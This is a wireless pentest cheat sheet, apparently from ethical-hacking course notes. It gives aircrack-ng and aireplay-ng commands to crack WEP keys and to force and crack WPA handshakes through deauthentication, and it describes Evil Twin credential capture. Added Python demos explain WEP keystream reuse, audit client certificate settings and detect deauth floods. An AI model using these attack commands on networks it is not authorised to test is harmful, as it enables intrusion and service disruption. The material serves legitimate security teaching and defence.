Wireless pentest

Open network

  • Usually for guest access and only for internet

  • The guest can access it directly or they need to authenticate through a portal

WEP

  • This protocol has been completely broken for many years and should not be used anymore.

  • We can find the key very easily

# Capture around 30 000 IVs (maybe more); -w sets the output capture file prefix
airodump-ng -c 11 --bssid 60:A4:4C:20:DF:60 -w out wlan0mon
# Generate ARP traffic so IVs accumulate faster (-b = AP BSSID, -h = MAC of an associated client)
aireplay-ng -3 -b 00:09:58:6F:64:1E -h 44:60:57:c8:58:A0 wlan0mon
# Monitor the number of IVs collected (airodump-ng names the file out-01.cap)
aircrack-ng out-01.cap
# Break the key once enough IVs are in the capture (same command, rerun as the file grows)
aircrack-ng out-01.cap
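To show why the key falls so easily, here is an added example (not part of the original cheat sheet) that reproduces the root cause in code: WEP keys RC4 with the 24-bit IV prepended to the shared key and sends the IV in clear, so the keystream repeats after a few thousand frames and two frames under one IV leak the XOR of their plaintexts. The key, IV and payloads are constructed sample values; the IV count from the commands above is used for the birthday-bound check.

```python
# Added example (not part of the original cheat sheet): why a 24-bit IV sinks WEP.
# WEP keys RC4 with IV || shared_key and sends the IV in clear. The IV space is
# only 2**24, so keystreams repeat after a few thousand frames, and two frames
# encrypted under the same IV leak P1 XOR P2 without touching the secret key.
# The key and plaintexts below are constructed sample values.
import math


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA) as WEP uses it; reference implementation for the demo only."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:                   # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP-style encryption: RC4 keyed with the 3-byte IV followed by the key (ICV omitted)."""
    keystream = rc4_keystream(iv + shared_key, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, keystream))


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def keystream_reuse_leak(shared_key, iv, p1, p2):
    """Return (C1 XOR C2, P1 XOR P2): equal whenever the same IV is reused under one key."""
    c1 = wep_encrypt(shared_key, iv, p1)
    c2 = wep_encrypt(shared_key, iv, p2)
    return xor_bytes(c1, c2), xor_bytes(p1, p2)


def iv_collision_probability(frames: int, iv_bits: int = 24) -> float:
    """Birthday bound: probability that at least one IV repeats among `frames` frames."""
    space = 2 ** iv_bits
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * space))


def expected_frames_to_first_repeat(iv_bits: int = 24) -> float:
    """Expected number of random IVs before the first repeat, about sqrt(pi * 2**bits / 2)."""
    return math.sqrt(math.pi * 2 ** iv_bits / 2)


def sample_leak():
    """Constructed demo: a 40-bit key, one IV, two same-length frame payloads."""
    key = bytes.fromhex("0102030405")          # constructed 40-bit WEP key
    iv = bytes.fromhex("aabbcc")               # constructed IV, repeated for both frames
    p1 = b"GET / HTTP/1.0\r\n"
    p2 = b"POST /a HTTP/1.0"
    return keystream_reuse_leak(key, iv, p1, p2)


if __name__ == "__main__":
    cipher_xor, plain_xor = sample_leak()
    print("C1^C2 == P1^P2:", cipher_xor == plain_xor)
    print("P(IV repeat) after 30 000 frames:", round(iv_collision_probability(30_000), 6))
    print("expected frames to first IV repeat:", round(expected_frames_to_first_repeat()))
```

The birthday bound gives a first IV repeat after roughly 5 100 frames on average, and a repeat is a near certainty by the 30 000 IVs the capture step aims for. The aircrack-ng run above goes further than this demo (it recovers the key itself from RC4's weak key schedule), but keystream reuse is already enough to read traffic, which is why the section says WEP must not be used.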

WPA

  • Two authentication modes:

    • Personal = WPA PSK (Pre-Shared Key) = authentication by a secret shared with everyone (like at home)

    • Enterprise = WPA MGT (Management) = EAP (Extensible Authentication Protocol). Several different EAP methods can be used (see the official list on the IANA website), but these are the most common:

      • PEAP: historically the only protocol supported by Windows. It transmits the AD credentials inside the tunnel via MSCHAPv2, which allows a NetNTLMv2 hash to be recovered through the Evil-Twin attack.

      • EAP-TTLS: very similar; it can authenticate with a login/password, which can be recovered via the Evil-Twin attack if the clients do not check the certificate of the access point.

      • EAP-TLS: mutual authentication by certificate.
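Whether PEAP or EAP-TTLS credentials can be harvested by an Evil Twin comes down to the client's supplicant settings, so here is an added example (not from the original notes) that audits wpa_supplicant-style network blocks for the settings that matter: a CA certificate to validate the RADIUS server and a name match so that any certificate from that CA is not accepted. The two network blocks are constructed samples showing the weak and the hardened form; the SSID, identity, password and certificate path are placeholders.

```python
# Added example (not from the original notes): audit wpa_supplicant-style network
# blocks for WPA-Enterprise settings that leave a client open to a rogue AP
# ("Evil Twin") presenting a forged RADIUS certificate. Tunnelled methods
# (PEAP, EAP-TTLS) are only as strong as the client's check of the server
# certificate; EAP-TLS additionally needs a client certificate.
# The two network blocks below are constructed samples, not a real site's config.
import re

WEAK_CONFIG = """
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice@corp.example"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}
"""

HARDENED_CONFIG = """
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice@corp.example"
    anonymous_identity="anonymous@corp.example"
    password="hunter2"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_match="radius.corp.example"
}
"""

_BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.S)
_KV_RE = re.compile(r'^\s*([A-Za-z_0-9]+)=(".*?"|\S+)\s*$', re.M)

# Any one of these pins the RADIUS server's name, not just its issuing CA.
SERVER_IDENTITY_KEYS = ("domain_match", "domain_suffix_match", "altsubject_match", "subject_match")


def parse_networks(config_text):
    """Return a list of dicts, one per network={...} block, with quotes stripped."""
    networks = []
    for body in _BLOCK_RE.findall(config_text):
        entry = {}
        for key, value in _KV_RE.findall(body):
            entry[key] = value.strip('"')
        networks.append(entry)
    return networks


def audit_network(net):
    """Return a list of findings for one network block (empty list = nothing found)."""
    findings = []
    if net.get("key_mgmt") != "WPA-EAP":
        return findings  # PSK / open networks are out of scope for this check
    eap = net.get("eap", "").upper()
    if eap in ("PEAP", "TTLS"):
        if "ca_cert" not in net:
            findings.append(f"{eap}: no ca_cert, server certificate is not validated")
        if not any(k in net for k in SERVER_IDENTITY_KEYS):
            findings.append(f"{eap}: no domain_match/domain_suffix_match, any cert from the CA is accepted")
        if "anonymous_identity" not in net:
            findings.append(f"{eap}: no anonymous_identity, the real username is sent in clear")
    elif eap == "TLS":
        if "ca_cert" not in net:
            findings.append("TLS: no ca_cert, server certificate is not validated")
        if "client_cert" not in net and "private_key" not in net:
            findings.append("TLS: no client certificate configured")
    return findings


def audit_config(config_text):
    """Map each SSID to its findings."""
    return {net.get("ssid", "?"): audit_network(net) for net in parse_networks(config_text)}


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_config(cfg))
```

Run against the weak block the audit reports three findings; the hardened block reports none. The same three settings have equivalents in Windows and mobile supplicant profiles (validate server certificate, trusted CA, expected server name), and that is the check worth making on client devices during an engagement rather than on the access point.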

The Hacking process

Source: Practical Ethical Hacking - TCM Security

# check that the wireless card is detected
iwconfig
# bring the card down if necessary
ifconfig wlan0 down
# kill processes that could interfere (NetworkManager, wpa_supplicant, ...)
airmon-ng check kill
# put the card in monitor mode
iwconfig wlan0 mode monitor
# bring it back up
ifconfig wlan0 up

OR

# check that the wireless card is detected
iwconfig
# kill processes that could interfere (NetworkManager, wpa_supplicant, ...)
airmon-ng check kill
# put the card in monitor mode (the interface is renamed wlan0mon)
airmon-ng start wlan0
# check that it worked
iwconfig
# find the SSIDs in scope for the test
airodump-ng wlan0mon
# monitor the target for handshakes: -c is the channel number and --bssid the AP MAC address, both found with the previous command
airodump-ng -c <channel-number> --bssid <MAC-ADDRESS> -w capture wlan0mon
# send a deauth to a connected station so that it reconnects and a fresh handshake is captured
aireplay-ng -0 1 -a <MAC-ADDRESS> -c <MAC-ADDRESS-STATION> wlan0mon
# check the capture .cap file that holds the handshake (airodump-ng numbers the files from -01)
ls capture*
# crack the handshake with a wordlist
aircrack-ng -w wordlist -b <MAC-ADDRESS> capture-01.cap
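The deauth step above is loud on the air, and a wireless IDS catches it by counting deauthentication and disassociation frames per transmitter. The following is an added example (not from the course material or the original notes) of that detection: it parses raw 802.11 management frame headers as captured in monitor mode, keeps a sliding window of deauth/disassoc frames per transmitter address and raises an alert on a burst. The frames, MAC addresses, timestamps, window and threshold are constructed sample values.

```python
# Added example (not from the original notes): a defender-side check for the
# deauthentication flood used to force a fresh WPA handshake. It parses raw
# 802.11 management frames (as seen in monitor mode or a .cap file), tallies
# deauth/disassoc frames per transmitter in a sliding window and flags bursts.
# Frames, MACs, timestamps and thresholds below are constructed samples.
import struct
from collections import defaultdict, deque

DEAUTH_SUBTYPE = 12      # type 0 (management), subtype 12 = Deauthentication
DISASSOC_SUBTYPE = 10    # type 0 (management), subtype 10 = Disassociation


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt_frame(frame: bytes):
    """Return a dict for a management frame, or None for other types / truncated input."""
    if len(frame) < 24:
        return None
    fc = frame[0]                      # frame control, first byte: version | type | subtype
    ftype = (fc >> 2) & 0x3
    subtype = (fc >> 4) & 0xF
    if ftype != 0:
        return None
    info = {
        "subtype": subtype,
        "addr1": mac_str(frame[4:10]),    # receiver
        "addr2": mac_str(frame[10:16]),   # transmitter
        "bssid": mac_str(frame[16:22]),
    }
    if subtype in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE) and len(frame) >= 26:
        info["reason"] = struct.unpack("<H", frame[24:26])[0]   # reason code, little-endian
    return info


def build_deauth(receiver: bytes, transmitter: bytes, bssid: bytes, reason: int = 7) -> bytes:
    """Construct a minimal deauth frame (no FCS) for the sample capture."""
    fc = (DEAUTH_SUBTYPE << 4) | (0 << 2)      # protocol version 0, type 0 (management)
    header = bytes([fc, 0x00]) + b"\x00\x00" + receiver + transmitter + bssid + b"\x00\x00"
    return header + struct.pack("<H", reason)


def detect_deauth_bursts(capture, window_s=2.0, threshold=5):
    """capture: iterable of (timestamp, frame_bytes). Returns one alert per bursting transmitter."""
    recent = defaultdict(deque)
    alerts = []
    alerted = set()
    for ts, frame in capture:
        info = parse_mgmt_frame(frame)
        if not info or info["subtype"] not in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE):
            continue
        q = recent[info["addr2"]]
        q.append(ts)
        while q and ts - q[0] > window_s:     # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold and info["addr2"] not in alerted:
            alerted.add(info["addr2"])
            alerts.append({"transmitter": info["addr2"], "bssid": info["bssid"],
                           "count": len(q), "at": ts})
    return alerts


def sample_capture():
    """Constructed: one legitimate deauth (reason 3, station leaving), then a burst spoofing the AP."""
    ap = bytes.fromhex("020000000001")         # constructed, locally administered AP MAC
    client = bytes.fromhex("020000000002")     # constructed station MAC
    frames = [(0.0, build_deauth(client, ap, ap, reason=3))]
    frames += [(10.0 + i * 0.1, build_deauth(client, ap, ap)) for i in range(8)]
    return frames


if __name__ == "__main__":
    for alert in detect_deauth_bursts(sample_capture()):
        print(alert)
```

The single deauth at t=0 falls out of the window and never alerts; the eight frames spaced 100 ms apart trip the threshold on the fifth one. Because the forged frames carry the AP's own address, a transmitter-only count flags the AP as the source; correlating with signal strength or a second sensor is what separates a spoofed burst from a misbehaving AP. Enabling 802.11w (Protected Management Frames) on the WPA2/WPA3 network is the mitigation that makes this deauth step fail outright.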

Tools

Equipment

  • The following equipment can be used for Wi-Fi pentests:

    • Wireless card Alfa AWUS036NH

    • Alfa AWUS1900

    • Alfa AWUS036ACH

    • Alfa AWUS052NH

    • Alfa AWUS051NH

    • Alfa AWUS036NHR

    • TP-Link TL-WN722N

    • Hak5 Pineapple Nano Basic

    • Flipper Zero along with the wifi dev board

Resources
